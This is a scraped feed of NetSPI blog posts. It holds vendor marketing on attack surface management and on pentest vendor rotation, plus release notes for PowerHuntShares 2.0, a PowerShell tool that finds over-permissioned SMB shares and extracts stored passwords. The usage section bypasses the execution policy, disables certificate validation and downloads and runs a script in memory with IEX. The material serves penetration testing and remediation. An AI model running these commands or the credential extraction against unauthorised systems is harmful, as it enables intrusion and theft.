While each of these tools are useful for their specific purposes, they lead to fragmented information silos, error-prone processes, and efficiency challenges of checking multiple systems for limited parts of the information needed. Security teams require a solution that provides real-time data, integrated workflows, and automated reporting on known and unknown assets throughout their environment. This lead often leads them to review a true attack surface management (ASM) solution

Gain Internal and External Attack Surface Visibility with NetSPI 

ASM solutions have grown exponentially in recent years. Forrester defines ASM as “solutions that continuously identify, assess, and manage the cybersecurity context of an entity’s IT asset estate.”  

Through the use of ASM, companies are able to identify and test known and unknown assets and vulnerabilities throughout their environment continuously, allowing them to stay on top of their security in between their point-in-time testing. This drastically reduces risk and improves operational efficiencies when paired with the correct ASM solution. However, not all ASM solutions are created equally.  

NetSPI External Attack Surface Management (EASM) delivers always-on external perimeter security, leveraging technology, processes, and human intelligence to uncover both known and unknown assets, while validating and prioritizing vulnerabilities. In addition, NetSPI Cyber Asset Attack Surface Management (CAASM) offers real-time visibility across users, applications, devices, and clouds, mapping and correlating assets within your technology stack to identify risks and coverage gaps. Together, these products deliver internal and external asset and risk visibility, always-on coverage, and deep data context to empower security teams. 

So, in summary, can you perform attack surface management on your own with open-source tooling? Yes. However, there will be additional challenges, inefficiencies, and costs.  

The best option is to work with a trusted ASM solution company like NetSPI, offering external and internal attack surface management solutions through NetSPI EASM and NetSPI CAASM. 

The post The Attack Surface is Changing – So Should Your Approach appeared first on NetSPI.

]]>
NetSPI’s Insights from Forrester’s Attack Surface Management Solutions Landscape, Q2 2024 https://www.netspi.com/blog/executive-blog/attack-surface-management/netspis-insights-from-forresters-attack-surface-management-solutions-landscape-q2-2024/ Thu, 21 Nov 2024 14:50:00 +0000 https://www.netspi.com/?p=26089 Read NetSPI’s perspective on key takeaways from Forrester’s The Attack Surface Management Solutions Landscape, Q2 2024.

The post NetSPI’s Insights from Forrester’s Attack Surface Management Solutions Landscape, Q2 2024 appeared first on NetSPI.

]]>
TL;DR

Forrester analyzed several attack surface management (ASM) vendors varying in size, type of offering, and use cases in its landscape report, The Attack Surface Management Solutions Landscape, Q2 2024. The NetSPI Platform was named by Forrester among notable vendors in the report for its Attack Surface Management solution.

The State of Attack Surface Management

ASM has grown exponentially over the last few years. Now a recognized market category, it equips businesses with crucial security strategies for comprehensive visibility into their attack surface. According to Forrester’s research, “ASM delivers insights on assets that ultimately support business objectives, keep the lights on, generate revenue, and delight customers.”  

NetSPI ASM allows you to inventory, contextualize, and prioritize assets and vulnerabilities on your internal and external attack surface with confidence and ease. Our ASM solution is backed by NetSPI’s team of dedicated security experts to help you discover, prioritize, and remediate security vulnerabilities of the highest importance, so you can protect what matters most to your business. 

Forrester on Choosing the Best ASM Solution

ASM is the first step in a proactive security program because it gives security teams a holistic view of your attack surface. Forrester defines ASM as “solutions that continuously identify, assess, and manage the cybersecurity context of an entity’s IT asset estate.” ASM allows your business to more clearly identify assets, establish and maintain the basics of a strong security system, and lay the groundwork for exposure management.  

Ideally, your ASM will offer both external attack surface management (EASM), which focuses on externally facing assets, and cyber asset attack surface management (CAASM), covering internally facing assets. This combination of EASM and CAASM provides both external and internal visibility to give you a complete picture of your assets. Additionally, the best ASM solutions will aid you in prioritizing risks specific to your business, guiding remediation steps, and integrating seamlessly into your environment. 

Opt For an All-In-One ASM Solution

When choosing an ASM partner, take into account the market dynamics in light of your current business challenges. Currently, the main market trend is ASM being delivered as part of a platform. This platform model gives security teams access to key proactive security solutions in a single technology. After all, no one likes switching programs to consolidate data.

In 2024, the ASM market’s top challenge is not the lack of visibility into the attack surface as you might expect, but the number of sources of visibility.

In 2024, the ASM market’s top challenge is not the lack of visibility into the attack surface as you might expect, but the number of sources of visibility. The information your security teams are looking to track is spread over too many sources, adding friction to gaining a comprehensive picture of the full attack surface.

A platform model addresses the challenge of technical debt by consolidating the security tech stack and optimizing the use of an ASM solution. This trend of consolidating solutions into a single platform will continue in the coming years as security teams face tighter budgets and look to get the most value of their current investments. 

NetSPI integrated our cornerstone solutions on The NetSPI Platform to equip security teams with a single proactive security solution. ASM, penetration testing as a service (PTaaS), and breach and attack simulation (BAS) are all delivered through NetSPI’s Platform, putting users one step closer to continuous threat exposure management (CTEM).  

Enhance Attack Surface Visibility with NetSPI

In its report, Forrester noted:

“The future and value of ASM is bringing these capabilities into a single view, meaning ASM has evolved into an established market that:  

  • Relies less on external discovery and more on continuous posture evaluation.
  • Contains a growing number of suppliers with substantial category crossover.
  • Aggregates common discovery capabilities.”

The true value of ASM lies in its ability to deliver a real-time, always-on, comprehensive depiction of the complete attack surface.  

When used together, NetSPI EASM and NetSPI CAASM check all the boxes by delivering complete attack surface visibility, always-on coverage, and deep data context. NetSPI’s Platform can inventory both internal and external assets and vulnerabilities as they are added to your environment, eliminating manual discovery and maintaining an accurate list for you and your team.  

NetSPI’s always-on monitoring capabilities ensure your attack surface is protected around the clock. These real-time updates allow you to inventory assets and tackle vulnerabilities as they arise, significantly reducing risk. NetSPI’s Platform shows descriptions, severity, attack paths, blast radius, and more throughout your entire attack surface to implement informed decision-making, prioritization, and resource allocation.

The post NetSPI’s Insights from Forrester’s Attack Surface Management Solutions Landscape, Q2 2024 appeared first on NetSPI.

]]>
Hunting SMB Shares, Again! Charts, Graphs, Passwords & LLM Magic for PowerHuntShares 2.0 https://www.netspi.com/blog/technical-blog/network-pentesting/powerhuntshares-2-0-release/ Thu, 14 Nov 2024 21:42:48 +0000 https://www.netspi.com/?p=25956 Learn how to identify, understand, attack, and remediate SMB shares configured with excessive privilege in active directory environments with the help of new charts, graphs, and LLM capabilities.

The post Hunting SMB Shares, Again! Charts, Graphs, Passwords & LLM Magic for PowerHuntShares 2.0 appeared first on NetSPI.

]]>
Every hacker has a story about abusing SMB shares, but it’s an attack surface that cybersecurity teams still struggle to understand, manage, and defend. For the benefit of both attackers and defenders, I started an open-source GitHub project a few years ago called “PowerHuntShares”. It focuses on distilling data related to shares configured with excessive privileges to better understand their relationships and risk. A lot has happened in the industry since the tool’s creation, so the PowerHuntShares v2 release is focused on making incremental progress by exploring some additional analysis techniques to help cybersecurity teams and penetration testers better identify, understand, attack, and remediate SMB shares in their environments. For those interested in the previous PowerHuntShares release, here is the blog and presentation.

Let the pseudo-TLDR/release notes begin!

TLDR: New Functionality & Insights

  • Interesting File Discovery (~ 200)
  • Automated Secrets Extraction (50)
  • Share & Application Fingerprinting – LLM-Based & Static (80)
  • Asset Risk Scoring
  • Share Similarity Scoring
  • Peer Comparison Benchmark
  • Share Creation Timeline Chart
  • Remediation & Task Reduction Calculations
  • ShareGraph Explorer

TLDR: Basic Functionality

  • Updated tables to support sort, filter, and csv export
  • Added charts that support csv and image export options using ApexCharts.js
  • Basic style updates

This release is packed with new functionality and insights, so let’s dive in!

Running PowerHuntShares

I’ve provided more details on the GitHub page, but PowerHuntShares is a simple PowerShell script that can be downloaded and run using PowerShell 5.1 or greater on Windows systems. Below is a summary of how to get started.

1. Download PowerHuntShares here.

2. Bypass the PowerShell execution policy if needed.

# Bypass execution policy restrictions
Set-ExecutionPolicy -Scope Process Bypass

*Additional Options Here – https://www.netspi.com/blog/technical-blog/network-pentesting/15-ways-to-bypass-the-powershell-execution-policy/

3. Load PowerHuntShares in one of two ways:

a. Option 1: Open PowerShell and import the module.

# Import module from the current directory
Import-Module .\PowerHuntShares.psm1

b. Option 2: Open PowerShell and load it directly from the internet.

# Reduce SSL operating level to support connection to GitHub
[System.Net.ServicePointManager]::ServerCertificateValidationCallback ={$true}
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12

# Download and load PowerHuntShares.psm1 into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1")

4. Run PowerHuntShares from the PowerShell console. If you are already a domain user on a computer associated with the target Active Directory domain, you can just run it. If you are starting from a non-domain system typically people run it using the process below.

a. Open cmd.exe and execute PowerShell or PowerShell ISE using the runas command so that network communication authenticates using a provided set of domain credentials.

runas /netonly /user:domain\user PowerShell.exe Set-ExecutionPolicy -Scope Process Bypass Import-Module Invoke-HuntSMBShares.ps1 Invoke-HuntSMBShares -Threads 20 -RunSpaceTimeOut 10 -OutputDirectory c:\folder\ -DomainController 10.1.1.1 -Username domain\user -Password password

Note: I’ve tried to provide time stamps and output during run-time, so you know what it’s doing.

After running, PowerHuntShares will output a new directory that contains an interactive HTML report, and a subdirectory named Results.

The Results directory houses csv files containing all the computer, share, file, and permission data collected, including things like excessive privileges and stored secret samples.

The interactive HTML report attempts to consolidate and summarize the results. You can expect the report to look something like this. It feels like a web app, but it’s really just a bloated HTML file ;).

Alrighty, now they we’ve covered how to run the basic script, let’s dig into some of the v2 features.

Risk Scoring

“Be honest, how bad is it?”

Some environments have thousands of insecure share permissions that need to be fixed, so a little guidance for prioritizing remediation can go a long way. That’s why risk scoring was such an important thing to include in this release. I may cover the (super simple) math in more depth in another blog, but for now just know that the risk model is a simple formula that helps evaluate and rank risk based on the questions below:

  • Is the share name known to be remotely exploitable?
  • Is the share writable?
  • Is the share readable?
  • Does the share potentially contain sensitive data?
  • Does the share potentially contain stored secrets?
  • Has the share been modified in the last year?
  • Is it a default share?
  • Is the share empty?

Yep, that’s it. Super simple.

When the PowerHuntShares PowerShell script runs, it will automatically evaluate the risk of every excessive permission it finds and save it to a csv file for you. However, I also wanted to include some of those results in the HTML report. While every page in the HTML report has a chart related to risk, the dashboard includes a nifty little chart showing the total number of permissions that fall into each risk bucket. You can also click the buttons for more details.

By default, the bar chart only shows ACEs with excessive permissions, but you can click Networks, Computers, and Shares to see the number of affected assets for each risk level, as shown below.

In the example above, you can see that 13 critical risk permissions were found on 7 shares, hosted on 2 computers, on one subnet.

Similarity Scoring

“How similar are shares that have the same name, can I fix them all at once?”

In the first version of PowerHuntShares I attempted to help blue teams reduce the number of remediation tasks by grouping shares by their name. However, the reality is that just because they share a name, doesn’t mean they’re the same. So, this round I wanted to find a more accurate way to measure and rank how similar groups of shares are based on some common criteria. I can cover the (very simple) math in another blog, but for your general knowledge, the similarity score is based on a formula that uses the following items to determine how similar a group of shares is:

  • Share Name
  • File Name (How many files of the same name exist in 10% or more of the shares in the group)
  • Folder Group Coverage (How many unique file listings exist)
  • Creation date to share name ratio
  • Last modified date to share name ratio
  • Owner to share name ratio
  • Folder group to share name ratio
  • Share descriptions to share name ratio

Now, you may be asking yourself, “Aren’t there cooler ways to measure similarity? Why didn’t I use a badass, well-known clustering algorithm for this?”. To that I would say, yes, that would be fun, but I’m using PowerShell to generate all of this and wanted to keep it “simple”. I was able to get the data into a cytoscape.js graph, but I didn’t have time to play with the algorithms for this release, maybe next round. 🙂 For now, you can find the similarity score in the “Share Names” section of the HTML report. As shown below, you can see the number of shares with the same name, their calculated similarity, number of folder groups, files share across share, and more.

Expandable Sections

“Show me more!”

Several people said that it would be nice if they had the ability to drill down into the data found in the HTML report tables. You have been heard. On the “Share Names” page we saw in the last section, you can now drill down into every column of every row, and you can click any of the items below to expand.

Expanding each section reveals a lot more data for those interested in more context. That includes, but is not limited to share application fingerprinting, creation/last modified dates, share owners, and even file listings.

Is it perfect? No. Is it a start in the right direction? Hopefully. 🙂

Peer Comparison Benchmark

“So, I have 1,000 critical risk configurations, really? Good to know, but how do I compare to my peers?”

I hear people say things like that a lot. Generally, I think some people want the option to say, “yeah, we’re not great, but neither is anyone else”. Regardless, if I think that is a valid or healthy narrative, I’ve distilled a lot of data to identify rough averages for the percentage of computers, shares, and permissions (ACE) affected by SMB share excessive permissions we’ve observed in the past. The numbers are not perfect, the numbers will suffer from data drift, but my hope is they will also give people a rough idea of how they compare to “normal”. Below is a look at the peer comparison chart on the HTML report dashboard.

Remediation Task Reduction Calculations

“Wait, I can fix 10 things instead of 1,000? Tell me how that works!”

Naturally, grouping shares by folder group, share name, or similarity score and remediating each group at once, can dramatically reduce the time it will take to clean up your environment. In some cases, we’ve seen up to a 90% reduction in remediation tasks. The remediation section of the dashboard now includes a summary and chart showing the benefits of those approaches.

Share Creation Timeline Chart

“When did all this happen, how long have we had this exposure?”

That’s another question I’ve heard from clients. The Share Creation Timeline is my second attempt to illustrate the story of offending share creation and how long high and critical risk configurations have been in the environment. This round I also added a line to show where the average is and attempted to identify abnormal spikes in share creation using standard deviation. I’ve found it helpful for storytelling. However, if you want to play with the time series data on your own, PowerHuntShares automatically saves the creation, last accessed, and last modified dates to the csv output files.

As a quick note, I used apexcharts.js for this timeline chart.

Share Fingerprinting

“I have no memory of this place.”

It is common for clients to have no idea what their shares are used for. In most companies there usually isn’t a person who knows the activities of every business unit. So having ways to generate additional context is useful for blue teams (and pentesters).  To help with that, I added a couple of methods for guessing the application context using static lists and optionally, the all mighty Large Language Model (LLM).

Static Share Fingerprinting Library

I did a little research on common applications and the shares they create. Out of that research, I created an initial library of about 80 applications and the associated share names. This fingerprint method will always run automatically. Accuracy is ok, but somewhere around ~70%.

LLM-Based Share Fingerprinting

Who wants to put AI in everything? Me, apparently. Guessing what applications are associated with share names alone can be tricky. I wanted a better way to identify potentially related applications using both the share name and the file listings. It turns out that a little bit of LLM prompt-foo can go a long way here. Accuracy is a little higher with this method coming in around ~80%.

For this first round, I decided to use Azure OpenAI Studio to spin up GPT 4o and GPT 4o mini endpoints. Thanks to Karl Fosaaen and Nick Stang, I’ve become a big fan. It was easy to set up and get rolling in no time. I’m not going to cover setup of the Azure endpoints in this blog, but I will say that once you have it setup, all you’ll need to get started with the new PowerHuntShares functionality is the API key and endpoint.

Below is a sample command, but please remember this has only been tested with the configuration above. No fine tuning was done, and no RAGs were used.

Invoke-HuntSMBShares -OutputDirectory C:\temp\ -ApiKey "[YourApiKey]" -Endpoint "https://yourendpoint.openai.azure.com/openai/deployments/yourendpoint/chat/completions?api-version=1849-08-01-preview" 

For those that want to play with share application fingerprinting without PowerHuntShares, I’ve also created a couple standalone functions here. Below are a few sample commands to give you a vibe for the options.

# Simple output from text query

Invoke-LLMRequest -SimpleOutput -apikey "your_api_key" -endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]" -text "What is 2+2?"

# Simple output from text query with image upload

Invoke-LLMRequest -SimpleOutput -apikey "your_api_key" -endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]" -text "What is this an image of?" -ImagePath "c:\temp\apple.png"

# Full output with all response meta data

Invoke-LLMRequest -apikey "your_api_key" -endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]" -text "What is 2+2?"

# Name from Command Line

Invoke-FingerprintShare -verbose  -ShareName "sccm" -FileList "variables.dat" -APIKEY "your_api_key" -Endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]"

# CSV Import

Invoke-FingerprintShare -MakeLog -verbose  -OutputFile 'c:\temp\testouput.csv' -FilePath "c:\temp\testinput.csv" -APIKEY "your_api_key" -Endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]"

# Data Table Import

Invoke-FingerprintShare -verbose -DataTable $exampleTable -APIKEY "your_api_key" -Endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]"

# Name from Command Line, CSV Import, and Data Table Import

Invoke-FingerprintShare -Verbose  -OutputFile 'c:\temp\testouput.csv' -FilePath "c:\temp\testinput.csv" -ShareName "sccm" -FileList "variables.dat" -DataTable $exampleTable -APIKEY "your_api_key" -Endpoint "https://[yourapiname].openai.azure.com/openai/deployments/[yourapiname]/chat/completions?api-version=[configuredversion]"

If you do end up using PowerHuntShares with the LLM option, it will generate additional csv files that include your results, and you can browse summary data in the interactive HTML report. The dashboard also includes an asset exposure summary. All the application related data is generated from the LLM requests. If you do not opt-in to use the LLM capabilities, this section simply won’t include the application related information.

If LLM capabilities are used, you’ll also be able to see the static and LLM application guess when expanding Share names on the “Share Names” page.

Finally, the guessed applications will be included in the folder group page to help provide additional context. As shown below, if the shares/files can’t be associated with an application, the “related app” section will be left blank or “unknown”.

There is a lot more work to do in this space related to performance, accuracy, and benchmarking, but that will have to be something I revisit in future blogs and releases.

Share Graph

“Can you help me visualize some of these share relationships?”

I’ve only heard that a few times from clients, but I wanted an excuse to play with graph visualization, so here we are. This round I used cytoscape.js to help convert share data into nodes and edges that we can explore in the HTML report. This is still very experimental, but it does support the basic feature below:

  • Search
    • Keyword match
    • Shortest Path
    • Blast Radius
    • Save Image
  • Filter
    • Filter out object types
  • Layout
    • Hide/Show labels
    • Change layout using preset algorithms
    • Zoom in/out
    • Reset
    • Show all nodes
  • Canvas (right-click nodes)
    • Center
    • Select
    • Expand
    • View
    • Hide
    • Show

I’ll wait to get feedback from folks before spending too much more time fixing bugs or building out new features. Below is a quick sample screenshot.

As I mentioned before, Cytoscape.js also supports a variety of super fun algorithms that can be used for a number of use cases, so hopefully I will get some time to explore their utility in the next release.

Interesting File Discovery

“Excessive privileges are bad, but what data is actually exposed?”

That is a common question from attackers and defenders alike. There are a lot of tools out there that can help with this, but a few people asked if I could roll some of that basic functionality into PowerHuntShares. I did a little research and came up with about 200 file types/keywords and mapped them to 7 file categories related to data exposure and remote code execution opportunities. Hopefully the functionality will help people better understand where there may be risk of password exposure, data exposure, or command execution. Those categories include:

  • Sensitive
  • Secret
  • SystemImage
  • Database
  • Backup
  • Script
  • Binaries

I realize that people may have their own categories and lists of target files/extensions, so I also added a feature to allow you to import those at runtime. You can download the template file here, and then use it to search for things you care about using the command below.

Invoke-HuntSMBShares -OutputDirectory 'c:\temp' -DomainController 'dc1.domain.com' -Username 'domain.com\user' -Password 'YourPassword' -FileKeywordsPath "C:\temp\interesting-files-template.csv"

Either way, PowerHuntShares will save your output to the csv and show your categories in the interactive HTML report. Below is a sample screenshot of the summary chart found on the dashboard page.

There is also a dedicated Interesting Files page that allows you to search, filter, dig into, and export UNC paths for files you may care about.

Secrets Extraction from Configuration Files

“Cool, I like the interesting files thing, but could you parse the passwords for me?”

I’ve heard this a lot from the pentest test team. I also researched common configuration files and wrote 50 configuration file parsers that can extract credentials of various types. They are all run automatically. For example, if the scanner finds a web.config file, it will extract the username, password, and other relevant bits from the file, save them to csv, and include them in the interactive HTML report shown below.

Just like the other tables, you can search, filter, sort, and export the list of target files. Also, as a bonus I have released the individual configuration parsers as standalone PowerShell scripts along with sample configuration files.

Considering I wrote 50 new parsers, my guess is that there will be edge cases that I haven’t considered. So, if you find a bug, please submit an issue or pull request to the GitHub project. If you’re not code savvy, also feel free to reach out to me on Twitter/X.

While youre surfing GitHub for more open-source projects in this space, I also recommend checking out SMBeagle, Snaffler , Nemesis, and of course the original Find-InterestingFile function from PowerSploit.

Mini Video Walkthrough

Below is a quick video walk through of the new updates in the PowerHuntShares v2 release.

Wrapping Up

This is still the beginning of exploring how we can better identify, understand, attack, and remediate SMB shares in Active Directory environments at scale.  There are many features and fixes I would like to apply to PowerHuntShares as time goes on, but for the meantime, I hope this release helps open some new doors for people.

Happy hunting and don’t forget to hack responsibly! 😊

The post Hunting SMB Shares, Again! Charts, Graphs, Passwords & LLM Magic for PowerHuntShares 2.0 appeared first on NetSPI.

]]>
Why Changing Pentesting Companies Could Be Your Best Move https://www.netspi.com/blog/executive-blog/penetration-testing-as-a-service/why-changing-pentesting-companies-could-be-your-best-move/ Tue, 12 Nov 2024 14:39:37 +0000 https://www.netspi.com/?p=25940 Explore strategic decisions on changing pentesting companies. Balance risk, compliance, and security goals with an effective pentesting partner.

The post Why Changing Pentesting Companies Could Be Your Best Move appeared first on NetSPI.

]]>
TL;DR
  • Changing pentesting vendors may be essential if your current provider lacks vigilance or repeatedly fails to identify security vulnerabilities. Getting a second opinion on pentesting is always a good idea.
  • An effective pentesting partnership delivers efficiency gains through comprehensive program-level insights, offering a profound understanding of your systems and the risks that are most relevant to your company.
  • Exercise diligence in your pentesting vendor selection and don’t settle for the status quo if the findings you’re getting aren’t vetted by security experts, prioritized based on your business context, and delivered with step-by-step remediation guidance.

Introduction

A common challenge we hear from customers is that they’re required to rotate pentesting companies periodically. Whether it’s to comply with regulations, or to meet industry best practices, changing pentesting companies is a project that can introduce risk to the performance of your pentesting program if done too quickly.

At NetSPI, we’ve worked with many customers who are facing the decision of whether to rotate away from their current pentesting company. Switching pentesting vendors is a critical decision that’s often driven by regulatory compliance or the need to uphold the highest security standards. We compiled our insights to guide you through this transition and keep your pentesting program running smoothly.

We’ll explore signs that indicate it’s time to change vendors, key considerations for comparing pentesting companies, and the advantages of forming a robust partnership with a skilled team of security experts.

Saying “Goodbye” is the Hardest Part… Signs You Should Change Pentesting Companies

We’ll start by saying that getting a second opinion on pentesting is always a best practice. It’s typical for our customers, especially larger ones, to benchmark NetSPI against other pentesting companies to compare the quality of findings. We call this a bakeoff, and even though there’s no baking involved, it gives us a chance to show NetSPI’s high standard of performance, which is the sweetest treat of all.

Getting a second opinion on pentesting is always a best practice.

We also need to touch on situations when rotating your pentesting vendor is mandated by law for compliance. For companies in highly regulated industries, such as finance and healthcare, it’s common to face mandatory vendor rotation periodically.

This is actually a good thing!

Back to our first point, getting a second opinion is always helpful. The biggest risk to the quality of pentesting is the team becoming complacent and accidentally overlooking findings that a fresh set of eyes can see. Remember, threat actors aren’t limited by scope, so having a pentesting team that brings creativity to their approach will make your security better in the end.

In some cases, pentesting vendors, including NetSPI, can navigate the requirement to rotate pentesting companies by offering a completely unique team within the company, even in a different country, if needed. This creativity can allow our customers to bypass the administrative aspects of new vendor onboarding, while complying with the mandate to rotate pentesting teams.

Lastly, if you sense a tone of complacency, or you feel the findings your pentesting vendor delivers only meet the status quo, then it’s a good time to consider a bakeoff.

At NetSPI, we methodically train our security consultants to be highly thorough in their tests, and we see this pay off time and time again when customers thank us for presenting a critical finding that another team missed. If you feel it’s time for change, you may be surprised by the insights that a new perspective can bring to your pentesting program.

Criteria to Consider when Comparing Pentesting Companies

Let’s assume you’ve made the decision to change pentesting companies. The next step is to prepare your criteria for evaluating new partners. Taking time to think critically is crucial at this step because it will influence the overall success of your pentesting program.

When researching penetration testing firms, consider these qualities to ensure the best fit: 

  1. Quality and Expertise: Look into the vendor’s track record and the level of expertise their team brings. High-quality service and knowledgeable support can significantly impact the success of your project.
  2. A Platform with Historical Account Information: Consider whether the vendor’s solution offers comprehensive access to historical account data. This can be a game-changer for making informed decisions, tracking progress over time, and sharing your security stance visually with broader teams.
  3. Onboarding, Account Access, and Administrative Aspects: Assess the ease of onboarding, the simplicity of accessing accounts, and the overall efficiency of administrative processes. Smooth operations in these areas contribute to a better user experience from the start. Trust us; that’s why we have an entire team devoted to customer onboarding and project management.
  4. Security of Systems: Evaluate the potential vendor’s security measures to protect sensitive data. At the end of the day, your pentesting vendor is another company in your supply chain, and ensuring their data security protocols meets or exceeds standards like General Data Protection Regulation (GDPR) is essential. 

Remember that your criteria are not limited to this list. However, it serves as a solid foundation for evaluating potential pentesting companies.

In-Blog Ad: How to Choose a Penetration Testing Company

So, What Does a Quality Pentesting Partnership Look Like?

We have six words to summarize what a strong pentesting partnership looks like: efficiency gains through program-level knowledge.  

In other words, when you have a strong partnership with a high-quality pentesting partner, the outcomes of your engagements will be more valuable to your security.

when you have a strong partnership with a high-quality pentesting partner, the outcomes of your engagements will be more valuable to your security

A few factors to consider:

Familiarity with the Environment

The more familiar a pentesting team is with your environment, the quicker they’re able to bring value to engagements. Reduced setup, preexisting familiarity with your systems, and added business context all contribute to knowing what’s actually important to you. This type of familiarity is only gained through long-term partnerships.

Central Platform for Historical Data

A modern approach to pentesting includes a central platform that brings visibility and prioritization to assets, vulnerabilities, and exposures. If your partnership offers a solution in addition to the pentesting team’s expertise, then it opens the door to providing deeper findings, a.k.a., the kind of info the C-suite cares about.  

A platform approach enables pentesters to view historical testing data, collective insights from different testing types, and a visualization of the actual path an adversary could take to gain access to identified assets. 

A strong pentesting partnership will consistently bring value to your overall security program. Gone are the days of siloed, point-in-time testing. Having a pentesting provider that can offer complementary solutions, such as attack surface management (ASM) with 24/7/365 visibility, enhances your security with a risk-based approach tailored to your business.

Ready for a Second Opinion on Pentesting?

Changing pentesting vendors can seem like an undertaking, but it’s often necessary for compliance, improved security, and better results. The best pentesting partnerships bring together a thorough understanding of your environment, access to historical data for informed decisions, and a team that can provide a fresh and innovative approach to security. With these elements in place, the value and efficiency of your pentesting program can be significantly enhanced.

If you’re considering whether it’s time for a change, remember that a new perspective from a trusted, competent partner could be exactly what your security program needs. Contact NetSPI for a consultation today.

The post Why Changing Pentesting Companies Could Be Your Best Move appeared first on NetSPI.

]]>